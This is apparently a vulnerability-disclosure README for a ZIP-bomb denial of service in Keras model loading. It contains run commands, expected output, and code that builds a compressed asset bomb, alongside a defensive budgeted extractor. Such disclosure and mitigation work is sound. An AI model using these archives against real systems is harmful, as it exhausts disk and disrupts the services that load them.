
Keras Native .keras asset ZIP bomb PoC

This repository contains a deterministic proof of concept for a Keras Native model-format denial of service in Keras 3.15.0 (keras-team/keras commit b49fde7f913c71d6e5dbd2a796ef45e1499b49eb).

keras.saving.load_model() applies its ZIP-bomb checks only to config.json and model.weights.h5. The presence of any additional archive member causes DiskIOStore(_ASSETS_DIRNAME, archive=zf, mode="r") to call file_utils.extract_open_archive(self.archive, self.tmp_dir), which extracts the entire .keras archive, assets/* included, into a temporary directory without checking any member's expansion ratio or the total extracted size. A small archive is therefore enough to exhaust the disk of whatever process loads it.

The included keras-asset-bomb-128m.keras is a tiny valid Keras model archive with one compressed asset:

  • archive size: about 142 KB
  • assets/bomb.bin compressed size: about 130 KB
  • assets/bomb.bin uncompressed size: 128 MiB
  • expansion ratio: about 1029x

Run:

python -m venv .venv
. .venv/bin/activate
pip install -e /path/to/keras scipy "jax[cpu]"
KERAS_BACKEND=numpy python verify_keras_asset_bomb.py keras-asset-bomb-128m.keras

Expected output includes:

loaded_model_type=Sequential
extract_calls=1
extract_0_bytes_written=134228929
extract_0_bomb_exists=True
extract_0_bomb_size=134217728

make_keras_asset_bomb.py can generate larger artifacts with --asset-size 5g. Do not run large variants on shared or low-disk systems: the full uncompressed asset is written to the temporary directory during load.
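The following Python is an added illustration, not one of this repository's scripts. It builds a small archive with the same member layout as keras-asset-bomb-128m.keras (a compressed zero-filled assets/bomb.bin beside config.json and model.weights.h5), audits the central directory the way a pre-load check could, and then extracts with a byte budget, which is the check extract_open_archive() is described above as lacking. The config and weights members are placeholder bytes and the archive is not meant to load in Keras; the 4 MiB default asset size, the 100x ratio threshold and the function names are assumptions made for the example.

```python
"""Added example, not code from the PoC repository: build a Keras-style asset
bomb, audit it from the central directory, then extract it under a byte budget.
The config and weights members are placeholders; the archive will not load in Keras."""
import json
import os
import tempfile
import zipfile

# Per the description above, Keras' own ZIP-bomb check covers only these two members.
KERAS_CHECKED_MEMBERS = {"config.json", "model.weights.h5"}


def build_bomb_archive(path, asset_mib=4, chunk_mib=1):
    """Write a .keras-style ZIP whose assets/bomb.bin inflates to asset_mib MiB of zeros."""
    config = {"module": "keras", "class_name": "Sequential",
              "config": {"name": "sequential", "layers": []}}  # placeholder config
    chunk = b"\0" * (chunk_mib << 20)
    with zipfile.ZipFile(path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("metadata.json", json.dumps({"keras_version": "3.15.0"}))
        zf.writestr("config.json", json.dumps(config))
        zf.writestr("model.weights.h5", os.urandom(1024))  # placeholder, not a real HDF5 file
        # Stream the zeros through the compressor so the generator never holds the payload in RAM.
        with zf.open("assets/bomb.bin", "w", force_zip64=True) as member:
            for _ in range(asset_mib // chunk_mib):
                member.write(chunk)
    return path


def audit_archive(path, max_ratio=100.0, max_total=1 << 30):
    """Check declared sizes in the central directory before extracting anything.

    Declared sizes are attacker-controlled, so this is only a cheap first gate;
    extract_with_budget() enforces the limits on what actually inflates.
    """
    members, offenders, total = [], [], 0
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ratio = info.file_size / info.compress_size if info.compress_size else 0.0
            members.append({"name": info.filename, "compressed": info.compress_size,
                            "uncompressed": info.file_size, "ratio": ratio,
                            "covered_by_keras_check": info.filename in KERAS_CHECKED_MEMBERS})
            total += info.file_size
            if ratio > max_ratio:
                offenders.append(info.filename)
    return {"members": members, "offenders": offenders,
            "declared_total": total, "total_exceeds_limit": total > max_total}


def extract_with_budget(path, dest, max_member=256 << 20, max_total=1 << 30, chunk=1 << 20):
    """Extract all members, counting inflated bytes instead of trusting the headers.

    Raises ValueError as soon as one member or the whole archive exceeds its budget;
    returns the number of bytes written otherwise.
    """
    root = os.path.abspath(dest)
    written = 0
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.abspath(os.path.join(root, info.filename))
            if not target.startswith(root + os.sep):  # reject ../ and absolute member names
                raise ValueError(f"unsafe member name: {info.filename}")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            member_bytes = 0
            with zf.open(info) as src, open(target, "wb") as dst:
                while buf := src.read(chunk):
                    member_bytes += len(buf)
                    written += len(buf)
                    if member_bytes > max_member or written > max_total:
                        raise ValueError(f"extraction budget exceeded at {info.filename}")
                    dst.write(buf)
    return written


def run_demo(asset_mib=4):
    """Build the archive in a temp dir, audit it, then extract once inside and once outside the budget."""
    workdir = tempfile.mkdtemp(prefix="keras-asset-bomb-")
    archive = build_bomb_archive(os.path.join(workdir, "bomb.keras"), asset_mib=asset_mib)
    report = audit_archive(archive)
    ok_bytes = extract_with_budget(archive, os.path.join(workdir, "out-ok"),
                                   max_member=(asset_mib + 1) << 20)
    try:
        extract_with_budget(archive, os.path.join(workdir, "out-blocked"),
                            max_member=(asset_mib << 20) - 1)
        blocked = False
    except ValueError:
        blocked = True
    return {"archive_bytes": os.path.getsize(archive), "audit": report,
            "ok_bytes": ok_bytes, "blocked_by_budget": blocked}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The audit alone is not a fix: a crafted central directory can under-declare file_size, so the byte-counting extractor is the part that actually bounds disk use, and it is what the page reports extract_open_archive() does not do. Raising the asset size to the 128 MiB of the shipped artifact only changes the numbers; the ratio stays close to the roughly 1029x listed above because the payload is all zeros.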
